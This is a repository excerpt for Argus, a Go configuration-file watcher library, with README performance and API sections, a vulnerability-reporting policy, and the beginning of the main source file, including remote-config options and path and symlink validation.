**[Orpheus CLI Integration →](./docs/cli-integration.md)** - Complete CLI documentation and examples

## Performance

Engineered for production environments with sustained monitoring and minimal overhead:

### Benchmarks
```
Configuration Monitoring:      12.10 ns/op     (99.999% efficiency)
Format Auto-Detection:         2.79 ns/op      (universal format support)
JSON Parsing (small):          1,712 ns/op     (616 B/op, 16 allocs/op)
JSON Parsing (large):          7,793 ns/op     (3,064 B/op, 86 allocs/op)
Event Processing:              25.51 ns/op     (BoreasLite single event, CPU-efficient)
Write Operations:              10.15 ns/op     (Ultra-fast file event writing)
vs Go Channels:                5.6x faster     (10.31 ns vs 57.62 ns/op)
CLI Command Parsing:             512 ns/op     (3 allocs/op, Orpheus framework)
```
**Test BoreasLite ring buffer performance**:
```bash
cd benchmarks && go test -bench="BenchmarkBoreasLite.*" -run=^$ -benchmem
```
See [isolated benchmarks](./benchmarks/) for detailed ring buffer performance analysis.

**Scalability (Setup Performance):**
```
File Count    Setup Time    Strategy Used
   50 files    11.92 μs/file  SmallBatch
  500 files    23.95 μs/file  LargeBatch
 1000 files    38.90 μs/file  LargeBatch
```
*Detection rate: 100% across all scales*

## Architecture

Argus provides intelligent configuration management through polling-based optimization with lock-free stat cache (12.10ns monitoring overhead), ultra-fast format detection (2.79ns per operation).

**[Complete Architecture Guide →](./docs/architecture.md)**


### Parser Support

Built-in parsers optimized for rapid deployment with full specification compliance available via plugins.

> **Advanced Features**: Complex configurations requiring full spec compliance should use plugin parsers via `argus.RegisterParser()`. See [docs/parser-guide.md](docs/parser-guide.md) for details.


## Core Framework

### ConfigWriter System
Atomic configuration file management with type-safe operations across all supported formats:

```go
// Create writer with automatic format detection
writer, err := argus.NewConfigWriter("config.yaml", argus.FormatYAML, config)
if err != nil {
    return err
}

// Type-safe value operations (zero allocations)
writer.SetValue("database.host", "localhost")
writer.SetValue("database.port", 5432)
writer.SetValue("debug", true)

// Atomic write to disk
if err := writer.WriteConfig(); err != nil {
    return err
}

// Query operations
host := writer.GetValue("database.host")      // 30ns, 0 allocs
keys := writer.ListKeys("database")           // Lists all database.* keys
exists := writer.DeleteValue("old.setting")   // Removes key if exists
```

### Configuration Binding

```go
// Ultra-fast configuration binding - zero reflection
var (
    dbHost     string
    dbPort     int
    enableSSL  bool
    timeout    time.Duration
)

err := argus.BindFromConfig(config).
    BindString(&dbHost, "database.host", "localhost").
    BindInt(&dbPort, "database.port", 5432).
    BindBool(&enableSSL, "database.ssl", true).
    BindDuration(&timeout, "database.timeout", 30*time.Second).
    Apply()

// Variables are now populated and ready to use!
```

**Performance**: 1,645,489 operations/second with single allocation per bind

**[Full API Reference →](./docs/api-reference.md)**


## Observability & Integrations

Professional OTEL tracing integration with zero core dependency pollution:

```go
// Clean separation: core Argus has no OTEL dependencies
auditLogger, _ := argus.NewAuditLogger(argus.DefaultAuditConfig())

// Optional OTEL wrapper (only when needed)
tracer := otel.Tracer("my-service")
wrapper := NewOTELAuditWrapper(auditLogger, tracer)

// Use either logger or wrapper seamlessly
wrapper.LogConfigChange("/etc/config.json", oldConfig, newConfig)
```

**[Complete OTEL Integration Example →](./examples/otel_integration/)**

## The Philosophy Behind Argus

Argus Panoptes was no ordinary guardian. While others slept, he watched. While others blinked, his hundred eyes remained ever vigilant. Hera chose him not for his strength, but for something rarer—his ability to see everything without ever growing weary.

The giant understood that true protection came not from reactive force, but from constant, intelligent awareness. His vigilance was not frantic or wasteful—each eye served a purpose, each moment of watching was deliberate.

When Zeus finally overcame the great guardian, Hera honored Argus by placing his hundred eyes upon the peacock's tail, ensuring his watchful spirit would endure forever.

### Unified Audit Configuration
```go
// Unified SQLite audit (recommended for cross-application correlation)
config := argus.DefaultAuditConfig()  // Uses unified SQLite backend

// Legacy JSONL audit (for backward compatibility)
config := argus.AuditConfig{
    Enabled:    true,
    OutputFile: filepath.Join(os.TempDir(), "argus-audit.jsonl"), // .jsonl = JSONL backend
    MinLevel:   argus.AuditInfo,
}

// Explicit unified SQLite configuration
config := argus.AuditConfig{
    Enabled:    true,
    OutputFile: "",  // Empty = unified SQLite backend
    MinLevel:   argus.AuditCritical,
}
```

## Documentation

**Quick Links:**
- **[Quick Start Guide](./docs/quick-start.md)** - Get running in 2 minutes
- **[Orpheus CLI Integration](./docs/cli-integration.md)** - Complete CLI documentation and examples
- **[API Reference](./docs/api-reference.md)** - Complete API documentation  
- **[Audit System](./docs/audit-system.md)** - Comprehensive audit and compliance guide
- **[Examples](./examples/)** - Production-ready configuration patterns

## License

Argus is licensed under the [Mozilla Public License 2.0](./LICENSE.md).

---

Argus • an AGILira fragment


## /SECURITY.md

# Security Policy

## Reporting a Vulnerability

We greatly value the efforts of the community in identifying and responsibly disclosing security vulnerabilities. Your contributions help us ensure the safety and reliability of our software.

If you have discovered a vulnerability in one of our products or have security concerns regarding AGILira software, please contact us at **security@agilira.com**.

To help us address your report effectively, please include the following details:

- **Steps to Reproduce**: A clear and concise description of how to reproduce the issue or a proof-of-concept.
- **Relevant Tools**: Any tools used during your investigation, including their versions.
- **Tool Output**: Logs, screenshots, or any other output that supports your findings.

For more information about AGILira's security practices, please visit our [Security Page](https://agilira.one/security).

Thank you for helping us maintain a secure and trustworthy environment for all users.

---

Argus • an AGILira fragment

## /argus.go

```go path="/argus.go" 
// argus: Ultra-lightweight configuration watcher with BoreasLite ultra-fast ring buffer
//
// Philosophy:
// - Minimal dependencies (AGILira ecosystem only: go-errors, go-timecache)
// - Polling-based approach for maximum OS portability
// - Intelligent caching to minimize os.Stat() syscalls (like go-timecache)
// - Thread-safe atomic operations
// - Zero allocations in hot paths
// - Configurable polling intervals
//
// Example Usage:
//   watcher := argus.New(argus.Config{
//       PollInterval: 5 * time.Second,
//       CacheTTL:     2 * time.Second,
//   })
//
//   watcher.Watch("config.json", func(event argus.ChangeEvent) {
//       // Handle configuration change
//       newConfig, err := LoadConfig(event.Path)
//       if err == nil {
//           atomicLevel.SetLevel(newConfig.Level)
//       }
//   })
//
//   watcher.Start()
//   defer watcher.Stop()
//
// Copyright (c) 2025 AGILira - A. Giordano
// Series: an AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"context"
	"fmt"
	"os"
	"path/filepath"
	"strings"
	"sync"
	"sync/atomic"
	"time"

	"github.com/agilira/go-errors"
	"github.com/agilira/go-timecache"
)

// fileStat caches file metadata to minimize os.Stat() calls
// Using value types instead of pointers to avoid use-after-free in concurrent access

// Error codes for Argus operations
const (
	ErrCodeInvalidConfig          = "ARGUS_INVALID_CONFIG"
	ErrCodeFileNotFound           = "ARGUS_FILE_NOT_FOUND"
	ErrCodeWatcherStopped         = "ARGUS_WATCHER_STOPPED"
	ErrCodeWatcherBusy            = "ARGUS_WATCHER_BUSY"
	ErrCodeRemoteConfigError      = "ARGUS_REMOTE_CONFIG_ERROR"
	ErrCodeConfigNotFound         = "ARGUS_CONFIG_NOT_FOUND"
	ErrCodeInvalidPollInterval    = "ARGUS_INVALID_POLL_INTERVAL"
	ErrCodeInvalidCacheTTL        = "ARGUS_INVALID_CACHE_TTL"
	ErrCodeInvalidMaxWatchedFiles = "ARGUS_INVALID_MAX_WATCHED_FILES"
	ErrCodeInvalidOptimization    = "ARGUS_INVALID_OPTIMIZATION"
	ErrCodeInvalidAuditConfig     = "ARGUS_INVALID_AUDIT_CONFIG"
	ErrCodeInvalidBufferSize      = "ARGUS_INVALID_BUFFER_SIZE"
	ErrCodeInvalidFlushInterval   = "ARGUS_INVALID_FLUSH_INTERVAL"
	ErrCodeInvalidOutputFile      = "ARGUS_INVALID_OUTPUT_FILE"
	ErrCodeUnwritableOutputFile   = "ARGUS_UNWRITABLE_OUTPUT_FILE"
	ErrCodeCacheTTLTooLarge       = "ARGUS_CACHE_TTL_TOO_LARGE"
	ErrCodePollIntervalTooSmall   = "ARGUS_POLL_INTERVAL_TOO_SMALL"
	ErrCodeMaxFilesTooLarge       = "ARGUS_MAX_FILES_TOO_LARGE"
	ErrCodeBoreasCapacityInvalid  = "ARGUS_INVALID_BOREAS_CAPACITY"
	ErrCodeConfigWriterError      = "ARGUS_CONFIG_WRITER_ERROR"
	ErrCodeSerializationError     = "ARGUS_SERIALIZATION_ERROR"
	ErrCodeIOError                = "ARGUS_IO_ERROR"
)

// ChangeEvent represents a file change notification
type ChangeEvent struct {
	Path     string    // File path that changed
	ModTime  time.Time // New modification time
	Size     int64     // New file size
	IsCreate bool      // True if file was created
	IsDelete bool      // True if file was deleted
	IsModify bool      // True if file was modified
}

// UpdateCallback is called when a watched file changes
type UpdateCallback func(event ChangeEvent)

// ErrorHandler is called when errors occur during file watching or parsing
// It receives the error and the file path where the error occurred
type ErrorHandler func(err error, filepath string)

// OptimizationStrategy defines how BoreasLite should optimize performance
type OptimizationStrategy int

const (
	// OptimizationAuto automatically chooses the best strategy based on file count
	// - 1-3 files: SingleEvent strategy (ultra-low latency)
	// - 4-20 files: SmallBatch strategy (balanced)
	// - 21+ files: LargeBatch strategy (high throughput)
	OptimizationAuto OptimizationStrategy = iota

	// OptimizationSingleEvent optimizes for 1-2 files with ultra-low latency
	// - Fast path for single events (24ns)
	// - Minimal batching overhead
	// - Aggressive spinning for immediate processing
	OptimizationSingleEvent

	// OptimizationSmallBatch optimizes for 3-20 files with balanced performance
	// - Small batch sizes (2-8 events)
	// - Moderate spinning with short sleeps
	// - Good balance between latency and throughput
	OptimizationSmallBatch

	// OptimizationLargeBatch optimizes for 20+ files with high throughput
	// - Large batch sizes (16-64 events)
	// - Zephyros-style 4x unrolling
	// - Focus on maximum throughput over latency
	OptimizationLargeBatch
)

// Config configures the Argus watcher behavior
type Config struct {
	// PollInterval is how often to check for file changes
	// Default: 5 seconds (good balance of responsiveness vs overhead)
	PollInterval time.Duration

	// CacheTTL is how long to cache os.Stat() results
	// Should be <= PollInterval for effectiveness
	// Default: PollInterval / 2
	CacheTTL time.Duration

	// MaxWatchedFiles limits the number of files that can be watched
	// Default: 100 (generous for config files)
	MaxWatchedFiles int

	// Audit configuration for security and compliance
	// Default: Enabled with secure defaults
	Audit AuditConfig

	// ErrorHandler is called when errors occur during file watching/parsing
	// If nil, errors are logged to stderr (backward compatible)
	// Example: func(err error, path string) { metrics.Increment("config.errors") }
	ErrorHandler ErrorHandler

	// OptimizationStrategy determines how BoreasLite optimizes performance
	// - OptimizationAuto: Automatically choose based on file count (default)
	// - OptimizationSingleEvent: Ultra-low latency for 1-2 files
	// - OptimizationSmallBatch: Balanced for 3-20 files
	// - OptimizationLargeBatch: High throughput for 20+ files
	OptimizationStrategy OptimizationStrategy

	// BoreasLiteCapacity sets the ring buffer size (must be power of 2)
	// - Auto/SingleEvent: 64 (minimal memory)
	// - SmallBatch: 128 (balanced)
	// - LargeBatch: 256+ (high throughput)
	// Default: 0 (auto-calculated based on strategy)
	BoreasLiteCapacity int64

	// Remote configuration with automatic fallback capabilities
	// When enabled, provides distributed configuration management with local fallback
	// Default: Disabled for backward compatibility
	Remote RemoteConfig
}

// RemoteConfig defines distributed configuration management with automatic fallback.
// This struct enables enterprise-grade remote configuration loading with resilient
// fallback capabilities for production deployments where configuration comes from
// distributed systems (Consul, etcd, Redis) but local fallback is required.
//
// The RemoteConfig system implements the following fallback sequence:
// 1. Attempt to load from PrimaryURL (e.g., consul://prod-consul/myapp/config)
// 2. On failure, attempt FallbackURL if configured (e.g., consul://backup-consul/myapp/config)
// 3. On complete remote failure, load from FallbackPath (e.g., /etc/myapp/fallback-config.json)
// 4. Continue with SyncInterval for automatic recovery when remote systems recover
//
// Zero-allocation design: All URLs and paths are pre-parsed and cached during
// initialization to avoid allocations during runtime operations.
//
// Production deployment patterns:
//
//	// Consul with local fallback (recommended)
//	Remote: RemoteConfig{
//	    Enabled:      true,
//	    PrimaryURL:   "consul://prod-consul:8500/config/myapp",
//	    FallbackPath: "/etc/myapp/config.json",
//	    SyncInterval: 30 * time.Second,
//	    Timeout:      10 * time.Second,
//	}
//
//	// Multi-datacenter setup with remote fallback
//	Remote: RemoteConfig{
//	    Enabled:      true,
//	    PrimaryURL:   "consul://dc1-consul:8500/config/myapp",
//	    FallbackURL:  "consul://dc2-consul:8500/config/myapp",
//	    FallbackPath: "/etc/myapp/emergency-config.json",
//	    SyncInterval: 60 * time.Second,
//	}
//
//	// Redis with backup Redis
//	Remote: RemoteConfig{
//	    Enabled:     true,
//	    PrimaryURL:  "redis://prod-redis:6379/0/myapp:config",
//	    FallbackURL: "redis://backup-redis:6379/0/myapp:config",
//	    SyncInterval: 15 * time.Second,
//	}
//
// Thread safety: RemoteConfig operations are thread-safe and can be called
// concurrently from multiple goroutines without external synchronization.
//
// Error handling: Failed remote loads automatically trigger fallback sequence.
// Applications receive the most recent successful configuration and error notifications
// through the standard ErrorHandler mechanism.
//
// Monitoring integration: All remote configuration operations generate audit events
// for monitoring, alerting, and compliance tracking in production environments.
type RemoteConfig struct {
	// Enabled controls whether remote configuration loading is active
	// Default: false (for backward compatibility)
	// When false, all other RemoteConfig fields are ignored
	Enabled bool `json:"enabled" yaml:"enabled" toml:"enabled"`

	// PrimaryURL is the main remote configuration source
	// Supports all registered remote providers (consul://, redis://, etcd://, http://, https://)
	// Examples:
	//   - "consul://prod-consul:8500/config/myapp?datacenter=dc1"
	//   - "redis://prod-redis:6379/0/myapp:config"
	//   - "etcd://prod-etcd:2379/config/myapp"
	//   - "https://config-api.company.com/api/v1/config/myapp"
	// Required when Enabled=true
	PrimaryURL string `json:"primary_url" yaml:"primary_url" toml:"primary_url"`

	// FallbackURL is an optional secondary remote configuration source
	// Used when PrimaryURL fails but before falling back to local file
	// Should typically be a different instance/datacenter of the same system
	// Examples:
	//   - "consul://backup-consul:8500/config/myapp"
	//   - "redis://backup-redis:6379/0/myapp:config"
	// Optional: can be empty to skip remote fallback
	FallbackURL string `json:"fallback_url,omitempty" yaml:"fallback_url,omitempty" toml:"fallback_url,omitempty"`

	// FallbackPath is a local file path used when all remote sources fail
	// This provides the ultimate fallback for high-availability deployments
	// The file should contain a valid configuration in JSON, YAML, or TOML format
	// Examples:
	//   - "/etc/myapp/emergency-config.json"
	//   - "/opt/myapp/fallback-config.yaml"
	//   - "./config/local-fallback.toml"
	// Recommended: Always configure for production deployments
	FallbackPath string `json:"fallback_path,omitempty" yaml:"fallback_path,omitempty" toml:"fallback_path,omitempty"`

	// SyncInterval controls how often to check for remote configuration updates
	// This applies to all remote sources (primary and fallback)
	// Shorter intervals provide faster updates but increase system load
	// Default: 30 seconds (good balance for most applications)
	// Production considerations:
	//   - High-frequency apps: 10-15 seconds
	//   - Standard apps: 30-60 seconds
	//   - Batch jobs: 5+ minutes
	SyncInterval time.Duration `json:"sync_interval" yaml:"sync_interval" toml:"sync_interval"`

	// Timeout controls the maximum time to wait for each remote configuration request
	// Applied to both primary and fallback URL requests
	// Should be shorter than SyncInterval to allow for fallback attempts
	// Default: 10 seconds (allows for network latency and processing)
	// Production recommendations:
	//   - Local network: 5-10 seconds
	//   - Cross-datacenter: 10-20 seconds
	//   - Internet-based: 20-30 seconds
	Timeout time.Duration `json:"timeout" yaml:"timeout" toml:"timeout"`

	// MaxRetries controls retry attempts for failed remote requests
	// Applied per URL (primary/fallback) before moving to next fallback level
	// Default: 2 (total of 3 attempts: initial + 2 retries)
	// Higher values increase reliability but also increase latency during failures
	MaxRetries int `json:"max_retries" yaml:"max_retries" toml:"max_retries"`

	// RetryDelay is the base delay between retry attempts
	// Uses exponential backoff: attempt N waits RetryDelay * 2^N
	// Default: 1 second (results in 1s, 2s, 4s... delays)
	// Should be balanced with Timeout to ensure retries fit within timeout window
	RetryDelay time.Duration `json:"retry_delay" yaml:"retry_delay" toml:"retry_delay"`
}

// fileStat represents cached file statistics for efficient os.Stat() caching.
// Uses value types and timecache for zero-allocation performance optimization.
type fileStat struct {
	modTime  time.Time // Last modification time from os.Stat()
	size     int64     // File size in bytes
	exists   bool      // Whether the file exists
	cachedAt int64     // Use timecache nano timestamp for zero-allocation timing
}

// isExpired checks if the cached stat is expired using timecache for zero-allocation timing
func (fs *fileStat) isExpired(ttl time.Duration) bool {
	now := timecache.CachedTimeNano()
	return (now - fs.cachedAt) > int64(ttl)
}

// watchedFile represents a file under observation with its callback and cached state.
// Optimized for minimal memory footprint and fast access during polling.
type watchedFile struct {
	path     string         // Absolute file path being watched
	callback UpdateCallback // User-provided callback for file changes
	lastStat fileStat       // Cached file statistics for change detection
}

// Watcher monitors configuration files for changes
// ULTRA-OPTIMIZED: Uses BoreasLite MPSC ring buffer + lock-free cache for maximum performance
type Watcher struct {
	config  Config
	files   map[string]*watchedFile
	filesMu sync.RWMutex

	// LOCK-FREE CACHE: Uses atomic.Pointer for zero-contention reads
	statCache atomic.Pointer[map[string]fileStat]

	// ZERO-ALLOCATION POLLING: Reusable slice to avoid allocations in pollFiles
	filesBuffer []*watchedFile

	// BOREAS LITE: Ultra-fast MPSC ring buffer for file events (DEFAULT)
	eventRing *BoreasLite

	// AUDIT SYSTEM: Comprehensive security and compliance logging
	auditLogger *AuditLogger

	running   atomic.Bool
	stopped   atomic.Bool // Tracks if explicitly stopped vs just not started
	stopCh    chan struct{}
	stoppedCh chan struct{}
	ctx       context.Context
	cancel    context.CancelFunc
}

// New creates a new Argus file watcher with BoreasLite integration
func New(config Config) *Watcher {
	cfg := config.WithDefaults()
	ctx, cancel := context.WithCancel(context.Background())

	// Initialize audit logger
	auditLogger, err := NewAuditLogger(cfg.Audit)
	if err != nil {
		// Fallback to disabled audit if setup fails
		auditLogger, _ = NewAuditLogger(AuditConfig{Enabled: false})
	}

	watcher := &Watcher{
		config:      *cfg,
		files:       make(map[string]*watchedFile),
		auditLogger: auditLogger,
		stopCh:      make(chan struct{}),
		stoppedCh:   make(chan struct{}),
		ctx:         ctx,
		cancel:      cancel,
	}

	// Initialize lock-free cache
	initialCache := make(map[string]fileStat)
	watcher.statCache.Store(&initialCache)

	// Initialize BoreasLite MPSC ring buffer with configured strategy
	watcher.eventRing = NewBoreasLite(
		watcher.config.BoreasLiteCapacity,
		watcher.config.OptimizationStrategy,
		watcher.processFileEvent,
	)

	return watcher
}

// processFileEvent processes events from the BoreasLite ring buffer
// This method is called by BoreasLite for each file change event
func (w *Watcher) processFileEvent(fileEvent *FileChangeEvent) {
	// CRITICAL: Panic recovery to prevent callback panics from crashing the watcher
	defer func() {
		if r := recover(); r != nil {
			w.auditLogger.LogFileWatch("callback_panic", string(fileEvent.Path[:]))
		}
	}()

	// Convert BoreasLite event back to standard ChangeEvent
	event := ConvertFileEventToChangeEvent(*fileEvent)

	// Find the corresponding watched file and call its callback
	w.filesMu.RLock()
	if wf, exists := w.files[event.Path]; exists {
		// Call the user's callback function
		wf.callback(event)

		// Log basic file change to audit system
		w.auditLogger.LogFileWatch("file_changed", event.Path)
	}
	w.filesMu.RUnlock()
}

// Watch adds a file to the watch list
func (w *Watcher) Watch(path string, callback UpdateCallback) error {
	if callback == nil {
		return errors.New(ErrCodeInvalidConfig, "callback cannot be nil")
	}

	// Check if watcher was explicitly stopped (not just not started)
	if w.stopped.Load() {
		return errors.New(ErrCodeWatcherStopped, "cannot add watch to stopped watcher")
	}

	// Validate and secure the path
	absPath, err := w.validateAndSecurePath(path)
	if err != nil {
		return err
	}

	// AUDIT: Log file watch start
	w.auditLogger.LogFileWatch("watch_start", absPath)

	return w.addWatchedFile(absPath, callback)
}

// validateAndSecurePath validates path security and returns absolute path
func (w *Watcher) validateAndSecurePath(path string) (string, error) {
	// SECURITY FIX: Validate path before processing to prevent path traversal attacks
	if err := ValidateSecurePath(path); err != nil {
		// AUDIT: Log security event for path traversal attempt
		w.auditLogger.LogSecurityEvent("path_traversal_attempt", "Rejected malicious file path",
			map[string]interface{}{
				"rejected_path": path,
				"reason":        err.Error(),
			})
		return "", errors.Wrap(err, ErrCodeInvalidConfig, "invalid or unsafe file path").
			WithContext("path", path)
	}

	absPath, err := filepath.Abs(path)
	if err != nil {
		return "", errors.Wrap(err, ErrCodeInvalidConfig, "invalid file path").
			WithContext("path", path)
	}

	// SECURITY: Double-check absolute path after resolution
	if err := ValidateSecurePath(absPath); err != nil {
		w.auditLogger.LogSecurityEvent("path_traversal_attempt", "Rejected malicious absolute path",
			map[string]interface{}{
				"rejected_path": absPath,
				"original_path": path,
				"reason":        err.Error(),
			})
		return "", errors.Wrap(err, ErrCodeInvalidConfig, "resolved path is unsafe").
			WithContext("absolute_path", absPath).
			WithContext("original_path", path)
	}

	// SECURITY: Check for symlink traversal attacks
	// If the path is a symlink, verify that its target is also safe
	if info, err := os.Lstat(absPath); err == nil && info.Mode()&os.ModeSymlink != 0 {
		target, err := filepath.EvalSymlinks(absPath)
		if err != nil {
			// If we can't resolve the symlink target, reject it for security
			w.auditLogger.LogSecurityEvent("symlink_traversal_attempt", "Symlink target resolution failed",
				map[string]interface{}{
					"symlink_path": absPath,
					"reason":       err.Error(),
				})
			return "", errors.Wrap(err, ErrCodeInvalidConfig, "cannot resolve symlink target").
				WithContext("symlink_path", absPath)
		}

		// Validate the symlink target
		if err := ValidateSecurePath(target); err != nil {
			w.auditLogger.LogSecurityEvent("symlink_traversal_attempt", "Symlink points to dangerous target",
				map[string]interface{}{
					"symlink_path": absPath,
					"target_path":  target,
					"reason":       err.Error(),
				})
			return "", errors.Wrap(err, ErrCodeInvalidConfig, "symlink target is unsafe").
				WithContext("symlink_path", absPath).
				WithContext("target_path", target)
		}

		// Update absPath to the resolved target for consistency
		absPath = target
	}

	// Validate symlinks
	if err := w.validateSymlinks(absPath, path); err != nil {
		return "", err
	}

	return absPath, nil
}

// validateSymlinks checks symlink security
func (w *Watcher) validateSymlinks(absPath, originalPath string) error {
	// SECURITY: Symlink resolution check
	// Resolve any symlinks and validate the final target path
	realPath, err := filepath.EvalSymlinks(absPath)
	if err == nil && realPath != absPath {
		// Path contains symlinks - validate the resolved target
		if err := ValidateSecurePath(realPath); err != nil {
			w.auditLogger.LogSecurityEvent("symlink_traversal_attempt", "Symlink points to unsafe location",
				map[string]interface{}{
					"symlink_path":  absPath,
					"resolved_path": realPath,
					"original_path": originalPath,
					"reason":        err.Error(),
				})
			return errors.Wrap(err, ErrCodeInvalidConfig, "symlink target is unsafe").
				WithContext("symlink_path", absPath).
				WithContext("resolved_path", realPath).
				WithContext("original_path", originalPath)
		}

		// Additional check: ensure symlink doesn't escape to system directories
		if w.isSystemDirectory(realPath) {
			w.auditLogger.LogSecurityEvent("symlink_system_access", "Symlink attempts to access system directory",
				map[string]interface{}{
					"symlink_path":  absPath,
					"resolved_path": realPath,
					"original_path": originalPath,
				})
			return errors.New(ErrCodeInvalidConfig, "symlink target accesses restricted system directory").
				WithContext("symlink_path", absPath).
				WithContext("resolved_path", realPath)
		}
	}
	return nil
}

// isSystemDirectory checks if path points to system directory
func (w *Watcher) isSystemDirectory(path string) bool {
	lowerPath := strings.ToLower(path)
	return strings.HasPrefix(path, "/etc/") ||
		strings.HasPrefix(path, "/proc/") ||
		strings.HasPrefix(path, "/sys/") ||
		strings.HasPrefix(path, "/dev/") ||
		strings.Contains(lowerPath, "windows\\system32") ||
		strings.Contains(lowerPath, "program files")
}

// addWatchedFile adds the file to watch list with proper locking
func (w *Watcher) addWatchedFile(absPath string, callback UpdateCallback) error {
	w.filesMu.Lock()
	defer w.filesMu.Unlock()

	if len(w.files) >= w.config.MaxWatchedFiles {
		// AUDIT: Log security event for limit exceeded
		w.auditLogger.LogSecurityEvent("watch_limit_exceeded", "Maximum watched files exceeded",
			map[string]interface{}{
				"path":          absPath,
				"max_files":     w.config.MaxWatchedFiles,
				"current_files": len(w.files),
			})
		return errors.New(ErrCodeInvalidConfig, "maximum watched files exceeded").
			WithContext("max_files", w.config.MaxWatchedFiles).
			WithContext("current_files", len(w.files))
	}

	// Get initial file stat
	initialStat, err := w.getStat(absPath)
	if err != nil && !os.IsNotExist(err) {
		return errors.Wrap(err, ErrCodeFileNotFound, "failed to stat file").
			WithContext("path", absPath)
	}

	w.files[absPath] = &watchedFile{
		path:     absPath,
		callback: callback,
		lastStat: initialStat,
	}

	// Adapt BoreasLite strategy based on file count (if Auto mode)
	if w.eventRing != nil {
		w.eventRing.AdaptStrategy(len(w.files))
	}

	return nil
}

// Unwatch removes a file from the watch list
func (w *Watcher) Unwatch(path string) error {
	absPath, err := filepath.Abs(path)
	if err != nil {
		return errors.Wrap(err, ErrCodeInvalidConfig, "invalid file path").
			WithContext("path", path)
	}

	w.filesMu.Lock()
	defer w.filesMu.Unlock()

	delete(w.files, absPath)

	// Adapt BoreasLite strategy based on updated file count (if Auto mode)
	if w.eventRing != nil {
		w.eventRing.AdaptStrategy(len(w.files))
	}

	// Clean up cache entry atomically
	w.removeFromCache(absPath)

	return nil
}

// Start begins watching files for changes
func (w *Watcher) Start() error {
	if !w.running.CompareAndSwap(false, true) {
		return errors.New(ErrCodeWatcherBusy, "watcher is already running")
	}

	// Start BoreasLite event processor in background
	go w.eventRing.RunProcessor()

	// Start main polling loop
	go w.watchLoop()
	return nil
}

// Stop stops the watcher and waits for cleanup
func (w *Watcher) Stop() error {
	if !w.running.CompareAndSwap(true, false) {
		return errors.New(ErrCodeWatcherStopped, "watcher is not running")
	}

	w.stopped.Store(true) // Mark as explicitly stopped
	w.cancel()
	close(w.stopCh)
	<-w.stoppedCh

	// Stop BoreasLite event processor
	w.eventRing.Stop()

	// CRITICAL FIX: Close audit logger to prevent resource leaks
	if w.auditLogger != nil {
		_ = w.auditLogger.Close()
	}

	return nil
}

// IsRunning returns true if the watcher is currently running
func (w *Watcher) IsRunning() bool {
	return w.running.Load()
}

// Close is an alias for Stop() for better resource management patterns
// Implements the common Close() interface for easy integration with defer statements
func (w *Watcher) Close() error {
	return w.Stop()
}

// GracefulShutdown performs a graceful shutdown with timeout control.
// This method provides production-grade shutdown capabilities with deterministic timeout handling,
// ensuring all resources are properly cleaned up without hanging indefinitely.
//
// The method performs the following shutdown sequence:
// 1. Signals shutdown intent to all goroutines via context cancellation
// 2. Waits for all file polling operations to complete
// 3. Flushes all pending audit events to persistent storage
// 4. Closes BoreasLite ring buffer and releases memory
// 5. Cleans up file descriptors and other system resources
//
// Zero-allocation design: Uses pre-allocated channels and avoids heap allocations
// during the shutdown process to maintain performance characteristics even during termination.
//
// Example usage:
//
//	watcher := argus.New(config)
//	defer watcher.GracefulShutdown(30 * time.Second) // 30s timeout for Kubernetes
//
//	// Kubernetes deployment
//	watcher := argus.New(config)
//	defer watcher.GracefulShutdown(time.Duration(terminationGracePeriodSeconds) * time.Second)
//
//	// CI/CD pipelines
//	watcher := argus.New(config)
//	defer watcher.GracefulShutdown(10 * time.Second) // Fast shutdown for tests
//
// Parameters:
//   - timeout: Maximum time to wait for graceful shutdown. If exceeded, the method returns
//     an error but resources are still cleaned up in the background.
//
// Returns:
//   - nil if shutdown completed within timeout
//   - ErrCodeWatcherStopped if watcher was already stopped
//   - ErrCodeWatcherBusy if shutdown timeout was exceeded (resources still cleaned up)
//
// Thread-safety: Safe to call from multiple goroutines. First caller wins, subsequent
// calls return immediately with appropriate status.
//
// Production considerations:
//   - Kubernetes: Use terminationGracePeriodSeconds - 5s to allow for signal propagation
//   - Docker: Typically 10-30 seconds is sufficient
//   - CI/CD: Use shorter timeouts (5-10s) for faster test cycles
//   - Load balancers: Ensure timeout exceeds health check intervals
func (w *Watcher) GracefulShutdown(timeout time.Duration) error {
	// Fast path: Check if already stopped without allocations
	if !w.running.Load() {
		return errors.New(ErrCodeWatcherStopped, "watcher is not running")
	}

	// Pre-validate timeout to avoid work if invalid
	if timeout <= 0 {
		return errors.New(ErrCodeInvalidConfig, "graceful shutdown timeout must be positive")
	}

	// Create timeout context - this is the only allocation we make
	ctx, cancel := context.WithTimeout(context.Background(), timeout)
	defer cancel()

	// Channel for shutdown completion signaling (buffered to avoid blocking)
	// Pre-allocated with capacity 1 to prevent goroutine leaks
	done := make(chan error, 1)

	// Execute shutdown in separate goroutine to respect timeout
	go func() {
		// Use existing Stop() method which handles all cleanup logic
		// This avoids code duplication and maintains consistency
		err := w.Stop()
		select {
		case done <- err:
			// Successfully sent result
		default:
			// Channel full (timeout already occurred), ignore
			// The shutdown still completes in background for resource safety
		}
	}()

	// Wait for completion or timeout
	// Zero additional allocations in this critical path
	select {
	case err := <-done:
		// Shutdown completed within timeout
		if err != nil {
			// Wrap the error to provide context about graceful shutdown
			return errors.Wrap(err, ErrCodeWatcherStopped, "graceful shutdown encountered error")
		}
		return nil

	case <-ctx.Done():
		// Timeout exceeded - return error but allow background cleanup to continue
		// This ensures resources are eventually freed even if timeout is too short
		return errors.New(ErrCodeWatcherBusy,
			fmt.Sprintf("graceful shutdown timeout (%v) exceeded, cleanup continuing in background", timeout))
	}
}

// WatchedFiles returns the number of currently watched files
func (w *Watcher) WatchedFiles() int {
	w.filesMu.RLock()
	defer w.filesMu.RUnlock()
	return len(w.files)
}

// getStat returns cached file statistics or performs os.Stat if cache is expired
// LOCK-FREE: Uses atomic.Pointer for zero-contention cache access with value types
func (w *Watcher) getStat(path string) (fileStat, error) {
	// Fast path: atomic read of cache (ZERO locks!)
	cacheMap := *w.statCache.Load()
	if cached, exists := cacheMap[path]; exists {
		// Check expiration without any locks
		if !cached.isExpired(w.config.CacheTTL) {
			return cached, nil
		}
	}

	// Slow path: cache miss or expired - perform actual os.Stat()
	info, err := os.Stat(path)
	stat := fileStat{
		cachedAt: timecache.CachedTimeNano(), // Use timecache for zero-allocation timestamp
		exists:   err == nil,
	}

	if err == nil {
		stat.modTime = info.ModTime()
		stat.size = info.Size()
	}

	// Update cache atomically (copy-on-write)
	w.updateCache(path, stat)

	// Return by value (no pointer, no use-after-free risk)
	return stat, err
}

// updateCache atomically updates the cache using copy-on-write (no pool, value types)
